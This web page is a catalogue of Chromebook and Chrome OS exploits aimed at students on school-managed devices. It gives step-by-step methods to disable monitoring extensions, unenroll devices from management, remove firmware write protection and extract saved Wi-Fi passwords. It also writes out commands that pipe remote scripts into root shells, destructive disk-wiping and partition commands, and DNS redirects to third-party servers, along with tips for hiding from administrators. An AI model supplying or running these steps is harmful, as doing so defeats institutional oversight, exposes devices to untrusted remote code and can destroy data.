This page is for Google Chrome/Chrome OS bypasses
For Windows exploits, see Bypasser’s Windowskit
Most web-based exploits will work on other Chromium-based browsers
proxy moment
Opens a proxy tab with about:blank cloaking.
Web-based exploit.
1: Make a bookmarklet with the link from xlak.github.io/alphabetic/ & run it.
2: Print the page (Ctrl+P), then cancel & click “try again”. A proxy tab will open.
1: Disable Wi-Fi.
2: Click "Sign in as Existing User".
3: Hold esc & click any app.
4: Click "Add Wi-Fi" & click any Wi-Fi.
5: Click "Diagnose" & go to Wi-Fi.
6: Click "Open in Settings", then close it.
7: Repeat step 2.
Requires Extension Dev Mode
Freezes extensions.
Web-based exploit.
1: Go to chrome://extensions & enable Extension Dev Mode.
2: Click on the background page of the extension you want to block, then "Network", "Disable Cache", & "No Throttling".
3: Go to Settings & click on the "Disable javascript" box. Keep this tab open.
4: Disable "No Throttling".
Requires access to DNS settings
Browse web from the sign-in screen.
Chrome OS-based exploit.
1: Sign out & click the settings button located at the top right of the Wi-Fi panel.
2: Set "Name servers" to "Custom name servers".
3: Set the first Custom name servers to 150.136.163.0.
You'll see a link on the normal sign-in screen that says "Visit this network's sign-in page".
4: Click on "Webview link for tests".
5: Click "Diagnose" & go to Wi-Fi.
Patched on Chrome OS 123+
Crashes extensions.
OS-based exploit.
1: Pin the extension you want to disable, sign out, disable Wi-Fi, & log back in.
2: Quickly enable Wi-Fi, open Chrome, & spam the pinned extension for ~30 seconds.
1: Get the code from here & paste it in a new tab.
2: Inspect the page that loads.
3: Click on “Console” at the top & paste the script in.
4: When an inspect window pops up, paste the script in again.
Requires powerwash.
Your extensions get corrupted & don't work.
Chrome OS-based exploit.
1: Powerwash your Chromebook.
2: Log into your Chromebook & immediately turn off Wi-Fi, then perform an instant restart (refresh+power).
3: Log back in & look for an option to log in as an existing user.
4: Go to chrome://extensions & turn on Wi-Fi.
5: Wait for your school’s blocking extension to appear. As soon as it does, turn off Wi-Fi & restart quickly.
6: Log back in, go back to extensions, & wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked.
Memory leak unavoidable; patched on Chrome OS 135+
Disables extension with a memory leak.
Web-based exploit.
1: Go to chrome://extensions.
2: In a new tab, go to the settings page of the extension you want to disable.
3: In another tab, go here & click the “freeze extension button”.
4: Immediately switch back to chrome://extensions & spam the “allow access to file URLs” for a few seconds.
5: The extension is now disabled. You need to flip the switch a few times every couple of minutes, & you may need to reopen the Dextensify page every once in a while to prevent an unavoidable memory leak from crashing the system.
Patched on Chrome OS 135+
Allows toggling of forced extensions by printing iframes. Based off LTMEAT Print method.
Web-based exploit.
ExtPrint3r.mp4
1: Open this link.
2: Look for your blocker on the list. If it isn't there, toggle "show all extensions" in the settings.
3: Click disable & follow the directions on the popup window. You'll need to do it very quickly.
If the extension switches back on, increase the iframe slider in the settings.
Requires tab limit.
Crashes the admin's ability to remove tabs, though they can still see your screen.
Web-based exploit.
1: Create a bookmarklet with this code.
2: Spam click the bookmarklet while holding Ctrl.
3: If you’re asked to close the page, click no & prevent the page from making additional dialogues.
Patched on Chrome OS 129+
har har har har har har
Created by crossjbly.
Web-based exploit.
1: Download this file.
2: Go here.
3: Once it loads, add "?experiments=true" to the end of the URL.
4: On the inspector page's sidebar, click the 2 arrows & select "Network".
5: Upload the har har file.
6: Double click the text that appears in the box.
Requires chrome://net-internals access.
Bypasses extensions that also use a Chrome app. Hapara & iBoss are known to work.
Web-based exploit.
1: Go to chrome://net-internals & click the "Domain Security Policy" tab.
2: Insert 127.0.0.1 in the "Add HSTS domain’s Domain" textbox, then click "Add".
3: Repeat step 2, but use "localhost" instead of 127.0.0.1.
4: Restart your computer.
Patched on Chrome OS 82+
Allows you to enter Incognito mode.
Web-based exploit.
1: Enter your username & password, but don't sign in.
2: Press Alt+Shift+I & spam the "Privacy Policy" for ~30-60 seconds.
3: Login, quickly go to the Incognito tab, then press Ctrl+Shift+N.
4: Close the original Incognito tab.
5: If it continues to open policy pages, repeat Step 4.
127 | OS | Blocksi; GoGuardian; Hapara; iBoss; Securly | chrome://flags | Incognito 123-127
Patched on Chrome OS 127+
Allows you to enter Incognito mode.
Web-based exploit.
1: Enable the chrome://flags/#captive-portal-popup-window flag (v123-125)/chrome://flags/#temporary-unexpire-flags-m124 (v126)/chrome://flags/#temporary-unexpire-flags-m125 (v126-127) flag & restart. If the flag didn't reset, continue.
2: In Wi-Fi Settings, set Name Servers to Custom Name Servers & the first box to detectportal.firefox.com/captive.apple.com/150.136.163.0 (any one of these).
3: Click sign-in on the popup, then press Ctrl+T.
4: Revert the change to Name Servers.
Doesn’t work with Hapara Highlights & Read&Write; patched on Chrome OS 111+
Uses locked mode to disable extensions. Formerly called Locked Mode Hack.
Web-based exploit.
Methods using (B) & (C) are patched on Chrome OS 115+ while the rest are patched on Chrome OS 135+
Crashes an extension's manifest file.
Web-based exploit.
Note: LTMEAT disables all extensions, not just your blocker.
Template URL: chrome-extension://ID/manifest.json
Extension IDs (Chrome):
Blocksi: pgmjaihnmedpcdkjcgigocogcbffgkbn
ContentKeeper: jdogphakondfdmcanpapfahkdomaicfa
Cisco Umbrella: jcdhmojfecjfmbdpchihbeilohgnbdci
Fortiguard: igbgpehnbmhgdgjbhkkpedommgmfbeao
GoGuardian: haldlgldplgnggkjaafhelgiaglafanh
Hapara: kbohafcopfpigkjdimdcdgenlhkmhbnc
iBoss: kmffehbidlalibfeklaefnckpidbodff
LANSchool: baleiojnjpgeojohhhfbichcodgljmnj
Linewize: ddfbkhpmcdbciejenfcolaaiebnjcbfc
NetRef: khfdeghnhlpdfeenmdofgcbilkngngcp
Securly: joflmkccibkooplaeoinecjbmdebglab
Smoothwall: jbldkhfglmgeihlcaeliadhipokhocnm
If your blocker ID isn’t on this list, go to the extension page & copy the character string in the URL.
LTMEAT.mp4
1: Take the Template URL & replace "ID" with the extension ID. This is the extension's manifest page.
2: Go to the extension’s manifest page & bookmark it (A), as well as chrome://kill (B) & chrome://hang (C).
3: While on (A), click on (B).
4: Instantly start spamming (C) & reload.
Web | Blocksi; GoGuardian; Hapara; iBoss; Securly | Switch Method
1: While on (A), click on (B).
2: Duplicate the tab.
3: Go to the extension’s settings page.
4: Flip the "Allow access to file URLs" switch.
Web | Blocksi; GoGuardian; Hapara; iBoss; Securly | Chat Method
1: Wait until your teacher opens the chat window.
2: Spam X until it stops opening.
3: Flip the “Allow access to file URLs” switch.
Web | Blocksi; GoGuardian; Hapara; iBoss; Securly | Temporary Method
1: Create a new bookmark folder (spam.js) & inside that folder, make 38 bookmarks of the page chrome-extension://id/background.js (you can do this easily with the bookmark manager).
2: Go to chrome://settings/performance & turn memory saver off. Under “Keep these sites always active”, add chrome-extension://id/background.js.
3: On a new tab, right click (spam.js) & click “open all (38)”. Repeat this step, then duplicate the rightmost page & go to your blocker’s extension page.
4: Flip the “Allow access to file URLs” switch & go to the leftmost tab. Right click it & select “Close tabs to the right”. Keep the remaining background.js tab open.
Web | Blocksi; GoGuardian; Hapara; iBoss; Securly | Skid Method
1: Go to (A) & click on (C).
2: Duplicate the tab (right click on it & click “duplicate”).
3: Go to your blocker’s extension page & flip the “Allow access to file URLs” switch.
Web | Blocksi; GoGuardian; Hapara; iBoss; Securly | Web Method
1: Go here & follow the instructions there.
Web | Blocksi; GoGuardian; Hapara; iBoss; Securly | Wi-Fi Method
1: Go to your blocker's extension page.
2: Disable Wi-Fi.
3: Spam the “Allow access to file URLs” switch.
4: Enable Wi-Fi.
5: Spam pin your extension.
Requires bookmarklets; patched on Chrome OS 115+
Loads pages without extensions.
Web-based exploit.
1: Create a bookmarklet by dragging the box that says “Quickview Launcher” from here into the Bookmarks Bar.
2: On that same page, double click the opener.
3: On the newly opened tab, run the bookmarklet.
Patched on Chrome OS 129+
Allows you to do a ton of things (with the right permissions).
Web-based exploit.
Rigtools.mp4
1: Keep this website open in a new tab.
2: Open this website & go to Network.
3: Double-click the black/grey box.
4: Click "extension-ID" & find the extension ID of the extension you want to disable, then paste it in. It should load a filesystem: page. You can have other extensions under it.
5: Run this code. Note it won't work if your extension's manifest file doesn't have the proper permissions.
Requires an extension with a textbox
Hangs extensions.
Web-based exploit.
1: Download the index.html & emoji files.
2: Insert the emoji file into the HTML file.
3: Click "Copy to Clipboard".
4: In a textbox from the extension you want to disable, paste &, after a second, paste again.
5: Immediately after, open a page related to the extension (such as the manifest file) & keep it open.
Requires a kiosk app; Most methods patched on version 119
Opens a window inside of a kiosk app, which has different permissions & extensions.
Chrome OS-based exploit.
Skiovox.mp4
1: In the login screen, turn off your Wi-Fi.
2: If you have a password, type it in but don’t press enter.
3: Click on a kiosk app & press Alt+Shift+S instantly.
4: Wait until you get a “network unavailable screen”.
5: On the toolbar, click accessibility & then the ?.
If you see a “back” button proceed to method A (steps A-B), otherwise go to method B (steps C-E) or method C (steps F-H).
Method A:
A: Click “add other Wi-Fi network” & immediately press Esc twice & Enter. If you get a screen saying “multi sign-in is disabled”, press Esc to bypass it.
B: There may be an open window belonging to your school profile, you can close it. In the window behind it that has no extensions, click the 3 dots & then click “new window”. Use this window instead. Go to steps 14+.
Method B:
C: Press the “diagnose” button.
D: Just click “add other Wi-Fi network”. This is inconsistent, try a few times with a few apps or use steps 11-13.
E: Click Wi-Fi, then the settings link. Close this window to reveal a Chrome window. Go to steps 14+.
Method C:
F: Just click “add other Wi-Fi network”.
G: Turn on text-to-speech (Ctrl+Alt+Z). Hold the Search key & press O, then T.
H: Click “resources” & one of the 3 links to open Chrome. Once your browser is open, you can turn text to speech off. Go to steps 14+.
This exploit has some problems that can be fixed by the Skiovox Helper. A ZIP file of the extension is available on the GitHub page as well as here.
6: Go to chrome://extensions & enable extension Dev Mode. Click “load unpacked” & in the select a file menu, right click the ZIP file you downloaded earlier, & click “extract all”. Select the newly extracted folder to install the extension.
Other notes:
Problems without Skiovox Helper:
-Unclear how to add an account/install extensions.
-Keyboard shortcuts are broken.
-It’s hard to remove or resize windows.
-Can’t view battery percentage or time.
The main difference between the results of method A (steps A-B) and those of method B (steps C-E) or method C (steps F-H) is that method A can open multiple windows, while the others can’t.
If your screen keeps falling asleep every 5 seconds, try a different kiosk app.
Your files, bookmarks, & history won’t transfer over to the exploit & vice versa.
To exit the exploit, either hold down your power button & sign out or type chrome://quit in a new tab.
OS | Blocksi; GoGuardian; Hapara; iBoss; Securly | Kiosk | 125/126 Method
1: Do the main methods steps 1-4.
2: Click the cog in the brightness settings instead.
3: Click on one of the links in Chromevox's Resources tab (Ctrl+Alt+Z), then disable it.
4: Click "Sign in as existing user" & login. If you don't see this, try a different kiosk app.
5: Press Esc on the "Multi user sign in disabled on this Chromebook" screen.
6: Turn on Wi-Fi & open a new window.
7: Go to main method steps 6+.
Note that any Incognito window is still monitored by your school.
Requires extension access.
Uses OneTab & European witch magic to unblock websites.
Web-based exploit.
1: Download the OneTab extension.
2: Click the "import" button in the extension's settings tab.
3: Add the URL you wish to visit ~100 times, then click "import".
4: Spam click the top link, then either spam Esc on one of the opened tabs or wait for one to load on an about:blank page.
Requires Name Servers.
I don't know man but it gets you an unblocked browser.
OS-based exploit.
1: Sign out & go to the Wi-Fi Settings.
2: Go to Name Servers & set it to "Custom Name Servers", then set at least 1 box to "52.207.185.90". If it doesn't automatically save, reconnect 1-3 times.
3: If you see a "Network not available" page, click "Sign in as an existing user" & then back until you reach the login screen.
4: Underneath there should be a "Sign in with Google account" button. Click it & then "Forgot Email?".
5: It should now show a 400 error page, click the Google logo.
Requires access to DNS settings
Connects you to a proxy server.
Chrome OS-based exploit.
1: Open the DNS settings.
2: Select "custom name servers" & set all of the boxes to 0.0.0.0.
3: Wait 5 seconds, then change them to 150.136.6.90.
4: In Google, go here.
5: Reload the page (Ctrl+Shift+R), then go here on the same tab.
6: Click on the big red triangle in the middle of the page & type "thisisunsafe". If you fail, reload the page & repeat this step.
7: Repeat step one & select "automatic name servers".
Patched on Chrome OS v132+
Shimboot via BadApple.
Chrome OS-based exploit.
1: Enter Recovery Mode (Esc+Power+Refresh), then Dev Mode (Ctrl+D), then Recovery Mode again, & finally miniOS (Internet Recovery).
External storage device method:
2: Flash an Appleboot shim on an external storage device & when miniOS loads plug it in.
3: Open the VT3 shell (Ctrl+Alt+F3) & find the external storage device identifier with "fdisk -l".
4: Once you've found it, run the payload with "mount /dev/sdX1 /usb && /usb/main.sh".
5: Select a disk & you'll boot into Linux.
Wireless method:
2: Click "Next", then on the "Connect to a network to begin recovery" connect to a network.
3: Once you see a "Start recovery" page, open the VT3 shell (Ctrl+Alt+F3).
4: Run "cd / && curl -LOk appleboot.appleflyer.xyz/usbless.sh && sh usbless.sh" to start the bootloader.
5: If this is your first time performing the exploit, install an Appleboot ROOTFS onto the stateful partition or an external storage device (not /dev/mmcblk0).
6: Select a disk & you'll boot into Linux.
Requires miniOS; patched on Chrome OS 132+
Chrome OS-based exploit.
BadApple.mp4
1: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
2: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
3: When connected, press Ctrl+Alt+F3.
Requires a storage device, another PC; patched on Chrome OS 125+ & kernver 4+ & keyrolled devices
Chrome OS-based exploit.
BadRecovery.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the kernver text ends in 4+, your Chromebook is unsupported.
3: Download a bin from cros.download.
4: Go here & upload it, then flash it.
5: Enter Recovery Mode (Esc+Refresh+Power).
6: Insert the external storage device & follow its instructions.
Requires a storage device, another PC; only works on Chrome OS v135-7 (due to sh1ttyOOBE)
Works on keyrolled devices.
Created by crossjbly.
Chrome OS-based exploit.
BadSH1MMER.mp4
1: Complete sh1ttyOOBE.
2: Make a BadSH1MMER image, then flash it.
3: Enter Recovery Mode (Esc+Refresh+Power).
4: Boot the external storage device & run any payloads you want, such as the BadBr0ker payload.
about:blank
Allows you to run bookmarklets on privileged pages.
Web-based exploit.
Blank3r.mp4
1: Make a bookmarklet with this code.
2: Go to chrome://extensions & click on an extension.
3: Click “view in Chrome Web Store” & spam escape. If it loads into a blank screen, run the bookmarklet.
4: Keep this tab open.
Any | Web | Blobe BM
Not compatible with every bookmarklet by design
Runs bookmarklets.
Web-based exploit.
1: Go to chrome://network#state.
2: Find the managed Wi-Fi under "Favorite Networks".
3: Click the "+" & copy all the text.
4: Go here & paste the text into the bar, then click "Download".
5: Go to chrome://network#general & import the ONC file.
Requires external storage device; patched on Chrome OS v133+
Unenrollment exploit.
If you're keyrolled, you can use the BadBr0ker payload in BadSH1MMER.
Chrome OS-based exploit.
Br0ker.mp4
1: Downgrade to v132 (or lower). You can skip this step if you build a SH1MMER shim yourself, as it includes a downgrading payload.
2: Flash a SH1MMER image with an updated payload & run it. If you're keyrolled, you can use BadSH1MMER instead.
3: Run the (Bad)Br0ker payload, then press Y to continue.
4: Once it restarts, wait until the "Get Started" button appears, then enter Dev Mode again.
5: Follow the instructions below based on your current version. You do not have to follow these if you're using BadBr0ker.
v110 & lower
A: Run this command in any root shell, then powerwash:
vpd -i RW_VPD -s check_enrollment=0
v111-124
A: Run these commands in either VT2 shell or Ctrl+U booted shim, then powerwash:
vpd -i RW_VPD -s check_enrollment=0
tpm_manager_client take_ownership
cryptohome --action=remove_firmware_management_parameters
v125-135
A: Powerwash, open VT2 shell, run these commands exactly (> included), then exit & set up the device (without rebooting until finished):
echo --enterprise-enable-unified-state-determination=never >/tmp/chrome_dev.conf
echo --enterprise-enable-forced-re-enrollment=never >>/tmp/chrome_dev.conf
echo --enterprise-enable-initial-enrollment=never >>/tmp/chrome_dev.conf
mount --bind /tmp/chrome_dev.conf /etc/chrome_dev.conf
initctl restart ui
v136+
A: Powerwash, open VT2 shell, run these commands exactly (> included), then exit & set up the device (without rebooting until finished):
echo --enterprise-enable-state-determination=never >/tmp/chrome_dev.conf
mount --bind /tmp/chrome_dev.conf /etc/chrome_dev.conf
initctl restart ui
6: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Certain boards are incompatible (see here); patched on Chrome OS 132+ & keyrolled devices
Unenrolls your Chromebook.
OS-based exploit.
BR1CK.mp4
1: Powerwash (Esc+Power+Refresh then Ctrl+D) & return to Secure Mode.
2: Go to chrome://network#logs & check all boxes under the options section.
3: Place the combined-logs.tar.gz file in here. If you don't have access, the time will be ~1-1.5 seconds less than the time it takes to enroll.
4: Sign out & powerwash again, but use Ctrl+Alt+Shift+R instead.
5: When the "Enterprise Enrollment" screen appears, wait until you're in the higher time range & perform an EC-Reset (Power+Refresh).
6: If you get a screen prompting you for recovery ("Chrome OS is missing or damaged" or "Something went wrong"), continue.
7: Perform SH1MMER (Legacy).
A: While you're here, disable the 5 minute Dev Mode wait.
8: Select Deprovision (D), then type "B" to open a bash shell.
9: Run this command: "gsctool -a -o" & press the power button when it spams "Press PP button now!".
10: Reenter Dev Mode, then when the "Enterprise Enrollment" screen shows up again enter Recovery Mode & boot into SH1MMER.
11: Run deprovision (D) & then reboot (E).
12: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Has to be done for each Wi-Fi network; patched on Chrome OS 128+
Prevents your Chromebook from automatically updating.
Web-based exploit.
CAUB.mp4
1: Go to chrome://network#state & scroll to the bottom.
2: Click the "+" by the name of the Wi-Fi network.
3: Copy the whole page (Ctrl+A then Ctrl+C).
4: Go to caub.glitch.me & paste it into the text box.
5: Click "generate onc" & download the file.
6: Go to chrome://network#general & import the onc file.
127 | Web | chrome://network | Flag Method
Requires chrome://flags access; patched on Chrome OS 128+
Chrome OS-based exploit.
1: Go to chrome://flags#show-metered-toggle & enable it.
2: Open Settings & go to Network >> Your Wi-Fi >> Advanced >> Show metered toggle & turn it on.
Requires Crosh, Dev Mode
Dump any kiosk app & then make it a regular Chrome OS app.
Chrome OS-based exploit.
ChrioskDumping.mp4
1: Enable Dev Mode, then add your home & then your school account.
2: Open Crosh (Ctrl+Alt+T) & run "shell", then go to "/home/chronos/{user account hash}/extentions/kiosk/" & find the ID of the kiosk app you want to dump.
TestNav: mdmkkicfmmkgmpkmkdikhlbggogpicma
SecureTestBrowser: hblfbmjdaalalhifaajnnodlkiloengc
NWEA: omkghcboodpimaoimdkmigofhjcpmpeb
CollegeBoard: joaneffahikmmipmidpkeedopejmhbbm
3: Back it up to your downloads folder by running "cp /home/chronos/{user account hash}/extentions/kiosk/(app ID) /home/chronos/{user account ID hash}/Downloads/".
4: Go into the folder & edit the "manifest.json" file. Delete the "kiosk_only": true line.
5: Load the folder with Extension Dev Mode in chrome://extensions (click "Load Unpacked").
d
Prevents your Chromebook from automatically updating by deleting the update partitions. Version of DAUB that allows for updating Chrome OS manually.
Works while enrolled.
OS-based exploit.
CKAUB.mp4
1: Access a shell (via methods such as SH1MMER or BadApple).
2: Mount a storage device with CKAUB.sh & run that payload.
Updating:
1: Run the payload, then run "dd if=/dev/sdX4 of=/dev/mmcblk0p2 bs=1M oflag=direct status=progress" & "dd if=/dev/sdX3 of=/dev/mmcblk0p3 bs=1M oflag=direct status=progress", where X is your external storage device's drive letter. You can run "lsblk" in the dialog where it asks you to enter the command.
2: When it asks you to flash a recovery image, flash one that's +1 kernver higher than your current.
Requires a storage device, another PC; patched on kernver 3+ & keyrolled devices
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.
Cryptosmite.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the kernver text ends in 3+, your Chromebook is unsupported.
3: Download a SH1MMER injected RMA shim from here or build your own (whether via Wax4Web or a command line).
4: Flash the injected RMA Shim onto a USB device.
5: Enter Recovery Mode (Esc+Refresh+Power) then Dev Mode (Ctrl+D).
6: Reenter Recovery Mode & plug in your external storage device.
7: Play some Tetris. This is legally required.
8: Use the Cryptosmite payload, this is "S" on Legacy. The decryption key is "Info-58-immense!NickName_Arabia-710" on older Legacy shims.
9: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Might not work
Prevents your Chromebook from automatically updating by deleting the update partitions. Also blocks kernver updates.
Just use CKAUB instead.
OS-based exploit.
DAUB.mp4
1: Access a shell (via methods such as SH1MMER or BadApple).
2: Run the following (3rd will open a prompt):
cgpt add /dev/mmcblk0 -i 2 -P 10 -T 5 -S 1
yes | mkfs.ext4 /dev/mmcblk0p1
fdisk /dev/mmcblk0
d 4
{just press enter}
d 5
{just press enter}
w
Requires a storage device; mostly limited
Downgrade your Chromebook.
Chrome OS-based exploit.
Downgration.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner & check what the kernver text ends in.
3: Go to chrome://version & check your board (after platform).
4: Go to cros.download & find your board.
5: Download the version of Chrome OS you want. Note the images come with kernver updates, & some versions have multiple variations with different kernver updates bundled in.
6: Flash the image.
7: On your Chromebook, enter Recovery Mode (Esc+Power+Refresh) & plug in your external storage device.
8: Skip the "Checking for Updates" screen by waiting, or on older versions by pressing Ctrl+Shift+E.
Requires a storage device; patched on Chrome OS 130+ & keyrolled devices
Boots into an unenrolled Chrome OS environment.
Chrome OS-based exploit.
E-Halcyon.mp4
1: Download a Chrome OS 107 bin from chrome100.dev & inject it yourself or download one from here.
A: Open a terminal & run "git clone https://github.com/MercuryWorkshop/RecoMod", "cd RecoMod", "chmod +x recomod.sh", & "sudo ./recomod.sh -i /path/to/recovery/image.bin --halcyon --rw_legacy".
2: Flash it onto a storage device.
3: Enter Recovery Mode (Esc+Refresh+Power) & plug in the storage device.
4: Spam E until you get a 5 minute wait sequence, then spam E again near the end of it.
5: Navigate to "Activate halcyon environment" & press enter, then navigate to "Install halcyon semi-tethered". Navigate back to "Activate halcyon environment" & select "Boot halcyon semi-tethered".
6: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
You can no longer boot Chrome OS normally, & will have to use the external storage device every time.
Doesn’t work with blocklist/banlist
Installs an extension without using the webstore.
Web-based exploit.
ExtensionLauncher.mp4
1: Make a bookmarklet with the code from here.
2: Go here & run the bookmarklet.
3: Find an extension you want to download.
4: Right-click the image to the left of the title & select "Copy image address". Paste the image address into the first bar.
5: Type the name of the extension into the second bar.
6: Copy the extension ID (string of random letters in the address bar). Paste it into the third bar.
7: Click "Download".
Visit the Extension Information page for information on some extensions.
Any | Hardware | Firmware Write Protection
Disabling FWWP allows you to do many things, including flashing custom firmware (allowing for installation of Linux, Windows, etc.) & setting GBB flags.
The method to disable FWWP depends on your Chromebook, however if you're on v114+ you must use the Pencil method while enrolled. History of FWWP:
PreCr50: these old boards used either a screw, a jumper, or a switch on the motherboard & are some of the simplest out there. If you happen to be lucky enough, I recommend trying this.
Cr50: following this, a new chip was added known as the Cr50. Cr50 Chromebooks set FWWP to the battery sense line prior to v115, while nowadays we require everybody's favorite Pencil method. You can also use Closed Case Debugging/SuzyQable on all of these, as long as you're unenrolled.
Ti50: the generation 2 Cr50 chip, better known as the Ti50, now verifies the RO portion of the firmware at boot, meaning you need to run a few commands to prevent bricking. Regardless of whether a Ti50 device supports another method, you must use CCD/SuzyQable (unenrolled), Ti50 FWWP Removal (VT2), or Pencil Sharpener (patched on v136).
Any | Hardware | Screwdriver | Screw
Requires screwdriver; doesn't work with FWMP on v114+
1: Turn your Chromebook off & unscrew the back cover.
2: Locate & unscrew the WP screw.
3: Screw the back cover back on.
113 | Hardware | Screwdriver | Jumper
Requires screwdriver, bridger; doesn't work with FWMP on v114+
1: Turn your Chromebook off & unscrew the back cover.
2: Disconnect the internal battery cover.
3: Locate & bridge the area for the WP jumper.
4: Reassemble the device.
Any | Hardware | Screwdriver | Battery
Requires screwdriver; doesn't work with FWMP on v114+
1: Turn your Chromebook off & unscrew the back cover.
2: Unplug the power cord connecting the battery & motherboard.
3: Run the necessary commands. If you're on v136+ change the device secret.
Save device secret: vpd -i RO_VPD -l
Change device secret: vpd -i RO_VPD -s stable_device_secret_DO_NOT_SHARE=device_secret
4: Plug the power cord back in & screw the back cover on (or just leave it off you fucking psycho).
Any | Hardware | Screwdriver | Pencil
1: oh fuck no not yet
Save device secret: vpd -i RO_VPD -l
Change device secret: vpd -i RO_VPD -s stable_device_secret_DO_NOT_SHARE=$(openssl rand -hex 32)
Any | Hardware | Dev Mode; Debug Cable/Ti50 | CCD
Requires Dev Mode; doesn't work with active FWMP; debug cable required on nonTi50
1: Enter Dev Mode, then open the VT2 Shell (Ctrl+Alt+F2 on login screen).
2: Login as root & run "gsctool -a -o".
3: Unless you removed the battery beforehand, you will be prompted to press the physical presence (PP) button multiple times; on most devices this is the power button.
4: When you see "Another press will be required!", do not press the button & wait until the text changes again.
5: Upon completion, you will see the message "PP Done!" confirming CCD enabling. Return to Dev Mode & the VT2 shell.
6: Login as root again, & if on a Cr50 device plug in the debug cable & run "ls /dev/ttyUSB*"; this should return with ttyUSB0, ttyUSB1, & ttyUSB2 if the cable is correctly connected.
7: Run "gsctool -a -I AllowUnverifiedRo:always", then press the PP.
8: Run "gsctool -a -w disable", then press the PP again, & run "flashrom --wp-disable".
Unbricking Ti50s: hold the power button, on Chromebooks press F2 twice or on Chromeboxes press the recovery pinhole instead, then release the power button & repeat.
GBB flags
Requires disabled FWWP
These allow you to edit certain things, such as the Dev Mode wait timer, disable FWMP (unenroll), force enable certain things such as USB booting, & more.
1: Go to the GBB Flaginator to easily select flags to set.
2: Run "futility gbb -s --flash --flags=0x120b7" on newer devices & "/usr/share/vboot/bin/set_gbb_flags.sh 0x120b7" on older ones to set flags. You can read them with "futility gbb -g --flash --flags"/"/usr/share/vboot/bin/get_gbb_flags.sh" respectively.
Requires Dev Mode, FWWP disabled
Dekeyrolls your device. Not the same as firmware 2, the updated version of Chromebook firmware included in v114+
Chrome OS-based exploit.
1: Enter the VT2 shell (Ctrl+Alt+F2), then sign in as chronos & run "curl -LO https://raw.githubusercontent.com/Cruzy22k/Firmware2/main/firmware.sh && sudo bash firmware.sh".
125-129 | OS; Unenrollment | ExternalPC; ExternalStorageDevice; Powerwash; RecoveryMode | Icarus Lite
Requires a storage device, another PC; requires Chrome OS 125-129
Unenrolls devices with device management interception using a proxy & a custom Certificate Authority.
Both devices should be on the same Wi-Fi network.
DO NOT USE PUBLIC ICARUS PROXIES.
Chrome OS-based exploit.
IcarusLite.mp4
1: On an external PC, clone the repo with "git clone --recursive https://github.com/cosmicdevv/Icarus-Lite.git" & change directory to it (cd Icarus-Lite).
2: Set up the environment. You can either run the following commands or the exe.
Nonkeyrolled
A: Check your Chromebook's board in chrome://version, then download a prebuilt SH1MMER bin (with the Icarus payload) here.
B: Flash it to an external storage device, enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked), then boot the shim.
Keyrolled
A: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
B: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
C: When connected, press Ctrl+Alt+F3 & run "bash <(curl -SLk http://ba.cosmion.xyz/script)".
3: Reboot into Verified Mode & do not click continue. Open up the Network Configuration instead (bottom right corner).
4: Set the connection type to "Manual" & the "Secure HTTP" options to those given earlier, then click "Save" & continue the setup process.
5: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Only works on unenrolled Chromebooks; requires a storage device
Switches your kernver.
Chrome OS-based exploit.
KVS.mp4
1: Unenroll your Chromebook.
3: Download a KVS bin from here.
4: Flash it onto a storage device.
5: Enter Dev Mode.
6: Reenter Recovery Mode.
7: Follow the instructions on-screen.
Very buggy
Bypasses Google's Locked Mode.
Web-based exploit.
1: Open the locked form twice.
2: Click "Continue" on both at the exact same time. Using a touchscreen will help a lot.
3: Click the Overview button (not Alt+Tab, that closes the quiz) on your keyboard.
Note you can't screenshot until the form has been submitted.
Requires Dev Mode
Spoofs Secure Mode with Dev Mode privileges. Continuation of Fakemurk.
OS-based exploit.
1: Enter Dev Mode (Esc+Power+Refresh; Ctrl+D) & the VT2 shell (Ctrl+Alt+F2).
2: Log in as root & run "bash <(curl -SLk https://bit.ly/murkmod)".
3: Install the helper extension (unzip the "helper" folder & load unpacked).
Only works with connected networks; Chrome OS exclusive
Gives the passwords to connected Wi-Fi networks from a .json file.
Web-based exploit.
PPT.mp4
1: Go to chrome://net-export.
2: Select "Include raw bytes" & start logging to disk.
3: Go to chrome://policy.
4: Click "Reload policies".
5: Go back to chrome://net-export & stop logging.
6: Go here or open this HTML file & upload the log file.
Requires a storage device; patched on v112+
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.
SH1MMER.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the kernver text ends in 2 or more, your Chromebook is unsupported.
3: Find your Chromebook’s board name by going to chrome://version. It will be behind “stable-channel”.
4: Download your board's RMA Shim at chrome100.dev & then inject the bin at Wax4Web, download an injected bin from here, or build one yourself.
Modern shims have a UI, while Legacy uses a commandline interface.
5: Flash the injected bin onto an external storage device.
6: Enter Recovery Mode (Esc+Refresh+Power), then press Ctrl+D & then enter.
7: Reenter Recovery Mode, then plug your shimmed storage medium into your Chromebook.
8: On Legacy shims, play some Tetris. This is legally required.
9: Run "Deprovision Device".
10: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Reenrollment
1: Enter Dev Mode, then press Esc+Power+Reload then Ctrl+D & then enter.
2: If you get a screen that says "You're already in Dev Mode", skip it by pressing Ctrl+D again.
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R). If you just entered Dev Mode, you can skip this step.
4: Once you enter the Wi-Fi password, click the "Enterprise Enrollment" button & sign in with your school account.
5: Once you're on the normal district login screen, press Ctrl+Alt+F2.
6: Type "root" as the login & "test0000" as the password if needed.
